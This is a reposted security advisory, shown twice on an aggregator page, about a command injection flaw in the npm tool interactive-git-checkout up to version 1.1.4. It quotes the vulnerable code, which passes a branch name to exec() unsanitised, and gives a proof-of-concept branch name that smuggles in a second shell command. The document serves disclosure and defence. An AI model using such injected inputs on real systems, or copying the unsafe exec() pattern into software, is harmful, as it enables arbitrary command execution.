Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-4wcm-7hjf-6xw5: interactive-git-checkout has a Command Injection vulnerability

The npm package interactive-git-checkout is an interactive command-line tool that allows users to checkout a git branch while it prompts for the branch name on the command-line. It is available as an npm package and can be installed via npm install -g interactive-git-checkout.

Resources:

  • Project’s npm package: https://www.npmjs.com/package/interactive-git-checkout

Command Injection Vulnerability

The interactive-git-checkout tool is vulnerable to a command injection vulnerability because it passes the branch name to the git checkout command using the Node.js child process module’s exec() function without proper input validation or sanitization.

The following vulnerable code snippets demonstrates the issue:

const { exec: execCb } = require('child_process');
const { promisify } = require('util');

const exec = promisify(execCb);

module.exports = async (targetBranch) => {
    const { stdout, stderr } = await exec(`git checkout ${targetBranch}`);
    process.stderr.write(stderr);
    process.stdout.write(stdout);
};

Exploit Proof of Concept

  1. Install the interactive-git-checkout package (as suggested by the package’s README):
npm install --global interactive-git-checkout
  1. Run the executable exposed by the installed package:
$ igc
  1. When prompted, enter the following branch name:
hello ; echo 'Command Injection Vulnerability Exploited!' > /tmp/command-injection.txt; #

Vulnerable versions

All versions of interactive-git-checkout are vulnerable to this issue, up to and including to the latest version of 1.1.4.

Author

Liran Tal

ghsa
Open in Source
#vulnerability#nodejs#js#git#auth

The npm package interactive-git-checkout is an interactive command-line tool that allows users to checkout a git branch while it prompts for the branch name on the command-line. It is available as an npm package and can be installed via npm install -g interactive-git-checkout.

Resources:

  • Project’s npm package: https://www.npmjs.com/package/interactive-git-checkout

Command Injection Vulnerability

The interactive-git-checkout tool is vulnerable to a command injection vulnerability because it passes the branch name to the git checkout command using the Node.js child process module’s exec() function without proper input validation or sanitization.

The following vulnerable code snippets demonstrates the issue:

const { exec: execCb } = require(‘child_process’); const { promisify } = require(‘util’);

const exec = promisify(execCb);

module.exports = async (targetBranch) => { const { stdout, stderr } = await exec(`git checkout ${targetBranch}`); process.stderr.write(stderr); process.stdout.write(stdout); };

Exploit Proof of Concept

  1. Install the interactive-git-checkout package (as suggested by the package’s README):

npm install --global interactive-git-checkout

  1. Run the executable exposed by the installed package:

  2. When prompted, enter the following branch name:

hello ; echo ‘Command Injection Vulnerability Exploited!’ > /tmp/command-injection.txt; #

Vulnerable versions

All versions of interactive-git-checkout are vulnerable to this issue, up to and including to the latest version of 1.1.4.

Author

Liran Tal

References

  • GHSA-4wcm-7hjf-6xw5
  • https://nvd.nist.gov/vuln/detail/CVE-2025-59046
  • ninofiliu/interactive-git-checkout@8dd832d

ghsa: Latest News

GHSA-68x2-mx4q-78m7: Angular SSR: Global Platform Injector Race Condition Leads to Cross-Request Data Leakage
ghsa